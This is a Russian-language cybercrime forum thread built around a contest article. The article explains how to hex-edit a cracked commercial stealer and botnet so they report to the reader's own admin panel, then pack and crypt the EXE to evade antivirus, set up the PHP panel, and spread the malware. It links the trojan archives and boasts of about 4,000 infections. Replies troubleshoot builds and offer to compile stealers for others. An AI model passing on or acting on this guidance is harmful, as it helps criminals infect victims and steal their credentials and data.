• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

После регистрации будут доступны основные разделы.

Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Авторская статья [MOLLY] Бесплатный стиллер/ботнет @ims0rry

Andres3310

Местный
Реакции
81
0 руб.
Telegram
Я не знаю за этот стиллер конкретно,но некоторые стиллеры специально выдают ''ошибку'', но по факту-запускаются.
напиши мне в телеге скину в нормальном виде где у визуал студио надо только поправить вот телега @Andres3310

RikiToni

Местный
Реакции
116
0 руб.
напиши мне в телеге скину в нормальном виде где у визуал студио надо только поправить вот телега @Andres3310
бро,я пока не шарю в кодинге,поэтому мне бесмысленно скидывать. Вчера попробовал сделать все по мануалу: зарегал бесплатный хост,сделал на нем бесплатный сайт, вписал этот сайт в стиллер,потом склеил с ddl-ками( без криптовки), далее закинул скрипт на хост, выгрузил базу, но что менять в config-е,чтобы все работало-хз,так как не знаю кодинг. А может и правильно все сделал(методом тыка),но потом голову не покидала мысль,что если хост бесплатный,то на нем ничего не выйдет.

linuxis

Местный
Реакции
62
0 руб.

User_67537

Guest
U

User_67537

Guest
molly поможешь с установкой софта?

ims0rry

Omae wa mou shindeiru

ims0rry

Omae wa mou shindeiru
Местный
Реакции
679
0 руб.
Jabber
Please note, if you want to make a deal with this user, that it is blocked.

ims0rry

Omae wa mou shindeiru

ims0rry

Omae wa mou shindeiru
Местный
Реакции
679
0 руб.
Jabber
Сорик, я давно читаю твои статьи в блоге, очень даже интересно, есть вопрос по панели, можешь выдать ее(исходники) как говорится в статье она бесплатная.
Не могу, она весит 20+мб, а у меня загрузка по speedtest 0.3 mb/s. Найди у кого-нибудь из клиентов

CypherZ

Местный
Реакции
182
0 руб.
Telegram
Jabber
Все пишут что все топ однако на деле ничего не работает, что за подвох?))
Сорик ты сней заодно?))

CRAMP

Резидент
Реакции
210
0 руб.
Все пишут что все топ однако на деле ничего не работает, что за подвох?))
Сорик ты сней заодно?))
оно и не будет работать) "она" вчера обиделась на правду что начил лить тут я и пошл"а" плакатся модераторам) на двух тачках ради интереса разными вариантами собирал ( нехера не пашет ) при тех условиях что в наличии как и родная админка так и ДДЛ.ки чисто дело было в exe. топ мать вашу)

CypherZ

Местный
Реакции
182
0 руб.
Telegram
Jabber
оно и не будет работать) "она" вчера обиделась на правду что начил лить тут я и пошл"а" плакатся модераторам) на двух тачках ради интереса разными вариантами собирал ( нехера не пашет ) при тех условиях что в наличии как и родная админка так и ДДЛ.ки чисто дело было в exe. топ мать вашу)
А почему у нее все работало? Или она не тестила?

danaforevr

питонист

danaforevr

питонист
Резидент
Реакции
516
0 руб.

CRAMP

Резидент
Реакции
210
0 руб.
А почему у нее все работало? Или она не тестила?
Ты где то видишь картинку с админ панели с логом? - Вот и ответ на твой вопрос_) все показано наглядно и не больше - как он вчера тут запел что это сделано только для того что когда спамхаус накроет админку чтобы не писать сорику чтобы дали новый билд - можно все поменять самому. пацык решил ворватся на пару соток баксов) и заним следом еще подтянулись аналогичные персонажи))

Stronger28

Новичок
Реакции
0
0 руб.
Было время такие гайды писались даже не за конкурс или еще какие-то вознагрождения, а можно сказать за спасибо. А если по теме то да достойно грамотно и пошагово все разжовано что даже мамонт разберется. Молодец девчушка ценю и спасибо было интересно и приятно почитать=)

saidbek

Новичок
Реакции
0
0 руб.
Статья написана специально для конкурса VLMI.
----------------------------------------------------

Приветствую мои зайки)

Моя первая статья на этом форуме, нужно зайти с широкой ноги так сказать.

Листала телегу, заметила, что на VLMI проводится конкурс. И фонд более-менее, и условия интересные, почему бы не подать заявку.
Думала-думала о чем бы таком написать.. Нужно что бы ims0rry оценил, да и простой народ понял что к чему. Нужно было что-то простое и наглядное, но в то-же время сногшибательное и мощное.
Но в голову нечего не шло, поэтому решила просто погуглить кто это вообще, ims0rry)
С пустой головой начала читать по этого кодера, кто он, что он, анализировала старые исходники.. Вообщем занималась чепухой.
В итоге решила ради интереса протестить софт который продается в настоящий момент.
Что могу сказать.. - для 19 лет очень не плохо, так держать мальчик! Но иногда нужно шифровать строки в *.exe , дабы злые девочки не получили твой продукт бесплатно.
Это и будет фишка сегодняшней статьи.

На основе чего будет происходить всё мясо? Ведь С++ не декомплится, а адрес админки спрятан внутри, как быть?

Пора переходить к делу) Сегодня будем брать и делать себе бесплатный хайповый продукт.

Инструкция (Стиллер)

Для начал нам нужны будут такие программы
- NEX редактор Тык
- Сам троян который выдается ims0rry Тык pass "molly"

Я думаю не нужно расписывать как устанавливать приложения под WIN и распаковывать архиви, да кисики?)

1) Открываем NEX редактор
59fedcb2fccffc7f5c4145df9ccac220.png

File => Open => Open File => Выбираем наш стиллер.

В итоге должно получится вот так.
f2f3ff036fe4579b7f05bbdd04464c9a.png

Нажимаем сочетание клавиш CTRL+F
Вводим в поиск "http"

778f8c9d4d4bccf52a466163f8ca795f.png

Нажимаем Find и смотрим что у нас получилось.
Поиск нашел вот такую строчку "http://yousite.ru" - это и есть наша админка.

ba6cdbc933cd61ce34b0f44a7ba0e528.png

Немного объясню что все это значит.
- Слева представлен код в системном виде, справа в человеческом.
- Каждая пара из букв-цифр слева есть цифра или буква справа. К примеру "68" это буква "h" (обведено красным)
- Строчка под желтым маркером слева соответствует строчке справа.
- Синий кружочек - на машинном он обозначается как пара "00" и показывает просто пустое место.

Как вставить свою админку:

1) Нажмите на букву "h" справа и пишите адрес своей админки по алгоритму "http://yousite.ru" или "http://you_IP"
То-есть нажимаете на первую букву адреса админки (в данном случае это буква "h" и начинаете писать свою админку. Символ за символ будет переписываться админка.
Примечание - без httpS и слешей. Админка такого типа недопустима "httpS://yousite.ru/sorry" , нет, так нельзя. То-есть админку нужно ставить в корень сайта. Хотя пробуйте, все возможно)

2) После того как вы вписали свою админку, то может оказаться, что ваш домен был слишком коротким, и там остались символы от старого адреса.
7a4221f8b84ba19fc7d3b8356ee7f864.png

(ошибочка вышла, в адресе не должно быть запятых, но я думаю вы простите меня дуреху =)

Красным цветом редактор сам выделил какие символы были заменены.
Желтым маркером показан какая строка была изменена.
Зеленым маркером редактор сам показывает, какой символ соответствует паре слева.
Видите, что от старой админки осталось "ru"? Нам нужно от этого избавится, поэтому нажимаем на лишнюю букву справа , тем временем выделяется пара слева, мы нажимаем на эту пару (в данном случае нам нужно убрать букву "r", редактором выделена пара "72") и меняем её значение на "00") и пишем "00"

112530147072f7300152c9041f95683d.png

Обратите внимание, что точка обозначается как "2е", а пустое место "00".

Все, теперь нажимаете CTRL+S , ваш файл перезаписывается, вы закрываете NEX редактор и идете паковать стиллер. Зачем паковать? Потому что кодер не вшил DLL в сам EXE, поэтому приходится обходится кустарным способом через SFX.

Как это сделать? хм, это расписано в данном мануале http://telegra.ph/Nastrojka-NoFile-03-05

- Криптовать нужно только Stealer.exe . Собранный SFX нельзя!
- Если вдруг кодер удалит Dll и инструкцию - выложу сюда.
- В мануал нужно внести маленькую поправочку - сжимать архив нужно максимально, а не по дефолту (так детектов -1 при нормальном крипте).

Все, стиллер на С++ готов. Теперь вам нужно будет потратить деньги только на хостинг и крипт.

Админка
- Админку нужно закидывать в корень хостинга.
- Настраивать проще простого:
1) Заливаете админку на хост.
2) Создаете базу данных.
3) Меняете данные подключение БД в config.php
4) Через phpmyadmin импортируете БД.
- Пароль/логин по дефолту admin, поменять можно в настройках или в phpmyadmin.

Проблем с админкой у вас возникнуть не должно, но если вдруг не получится - google в помощь.
Сам скрипт админки вы можете взять тут или попросить у ims0rry =)

Куриями ботнет
К сожалению ботнет за 200$ постигла та-же участь.

Делаете все так же само:
- Открываете NEX
- Ищете там адрес админки и меняете на свой.
- Но теперь нужно искать не словом "http", а "yousite"
29efbf3ce125110cbc2e0f238d3c0b47.png

Но там не нужно писать http:// , а сразу админку по алгоритму site.ru без слешей и прочей ерунды.

На данный момент я достала только файл ботнета базовой версии, без модуля стиллера и так далее, если у вас есть - скиньте в коментах, я подредактирую тему.

Инструменты для работы:
- Админка стиллера Тык

- Троян стиллера Тык
- Админка ботнета Тык
- Троян ботнета Тык
- NEX редактор Тык
Пароль на архивы "molly"

Ну что же, подведем итоги)
- Софт оказался не такой уж и не бронированный, если постараться можно и землю сдвинуть.

- Далее хоть и волна хайпа прошла на стиллеры, ботнеты и прочую лабуду - продажи придется притормозить до обновления, а что бы обновленный продукт купили - нужно ой как постараться добавить туда много фишек.
Но если автор добавит много-много лабуды в виде "добавлено шифрования тела трояна" - нечего не изменится, так как люди платят не за софт, а за результат, за его выхлоп. А что там внутри - им срать. Это вовсе не критика, нет, просто выражаюсь как могу.
- Протестила софт в работе, криптанула и пролила 4к инсталлов (+-500 , там как получилось). Отстучало 3700, но крипт был хороший + подпись на файл за 600$.

Вот и все мои дорогие, сегодня вы научились бесплатно клепать рабочий софт без зависимостей, пользуйтесь ним, ломайте всех и зарабатывайте деньжата)

По всем вопросам писать в Telegram @molly_girl
Отблагодарить на винишко можете в лс)
Molly.
Для просмотра содержимого вам необходимо авторизоваться.

Singleton

Новичок
Реакции
0
0 руб.
Не робит ведь.
Вначале так читаешь и думаешль вот дама молодец :)
А потом когда все протестишь, ничего не работает. Все об этом пишут. Но при этом лайкают пост.

MOLLY GIRL

Участник
Реакции
112
0 руб.
Telegram
Многие пишут что не стучит стилак. У половины сам EXE крашится перед запуском, у других запрашивает нужную версию WIN.
Сама проблема в экзешнике. Ну и вашей вины там тоже немного есть)
a2188bcfaa2f660ea16e62569e542ebd.png

Для начала не нужно писать такой длинный домен, который будет доставать до следующей строчки (string too long..) Оставьте хотя бы один нулёвы перед этими словами .
Синим показано, что там так и должно быть пустое место, нельзя в целом переносить домен на несколько символов назад или вперед.
Красным/Красным показано, что всё остальное место которое осталось, нужно забивать НУЛЁВЫМИ, а не обычными точками.
Паковать в SFX нужно только Stealer.exe , а не Stealer (2) и т.д.

Вернемся к ошибке, да, в некоторых случаях проблема была из-за кривого EXE. Увы, другого у меня не было, но спасибо Рикитону, за то что скинул свой почищенный файл.

Сам файл - http://dropmefiles.com/q0t3P пароль 111

P.S. Если кто то не смог собрать, пишите в ЛС домен, я соберу. Или какие-то проблемы - я все помогу. Почему в телегу? У каждого индивидуальный случай, но общую ошибку нашла - кривой EXE.

И на фоне всего кипиша который произошел - ребят, не нужно многословить, нужно кратко и с пруфами идти, а не заливать водой соперника)
- Там чужая админка... Посмотрите через NEX, что там.
- Логи идут в чужую админку... Ставите сниффер и смотрите.
Не нужно быть стадом баранов. не то место.

А то понавыкладываете скрины пустых админок (СКРИНЫ!) и начинается срач)

Последнее редактирование:

CRAMP

Резидент
Реакции
210
0 руб.
Многие пишут что не стучит стилак. У половины сам EXE крашится перед запуском, у других запрашивает нужную версию WIN.
Сама проблема в экзешнике. Ну и вашей вины там тоже немного есть)
a2188bcfaa2f660ea16e62569e542ebd.png

Для начала не нужно писать такой длинный домен, который будет доставать до следующей строчки (string too long..) Оставьте хотя бы один нулёвы перед этими словами .
Синим показано, что там так и должно быть пустое место, нельзя в целом переносить домен на несколько символов назад или вперед.
Красным/Красным показано, что всё остальное место которое осталось, нужно забивать НУЛЁВЫМИ, а не обычными точками.
Паковать в SFX нужно только Stealer.exe , а не Stealer (2) и т.д.

Вернемся к ошибке, да, в некоторых случаях проблема была из-за кривого EXE. Увы, другого у меня не было, но спасибо Рикитону, за то что скинул свой почищенный файл.

Сам файл - http://dropmefiles.com/q0t3P пароль 111

P.S. Если кто то не смог собрать, пишите в ЛС домен, я соберу. Или какие-то проблемы - я все помогу. Почему в телегу? У каждого индивидуальный случай, но общую ошибку нашла - кривой EXE.

И на фоне всего кипиша который произошел - ребят, не нужно многословить, нужно кратко и с пруфами идти, а не заливать водой соперника)
- Там чужая админка... Посмотрите через NEX, что там.
- Логи идут в чужую админку... Ставите сниффер и смотрите.
Не нужно быть стадом баранов. не то место.

А то понавыкладываете скрины пустых админок (СКРИНЫ!) и начинается срач)

321113.png
С видео что не получилось?

Сверху Снизу